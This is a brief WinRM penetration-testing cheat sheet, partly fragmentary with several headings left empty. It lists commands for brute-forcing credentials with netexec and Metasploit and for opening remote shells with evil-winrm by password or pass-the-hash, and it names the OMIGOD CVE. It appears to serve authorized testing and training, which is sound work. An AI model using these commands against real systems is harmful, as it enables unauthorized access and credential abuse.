WinRM (Windows Remote Management) Pentesting
Enumeration
Brute Force Credentials
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_loginConnect
Using Username/Password
evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -SUsing Kerberos Authentication
Commands
Command Execution with NetExec
OMIGOD (CVE-2021-38647)
References
Last updated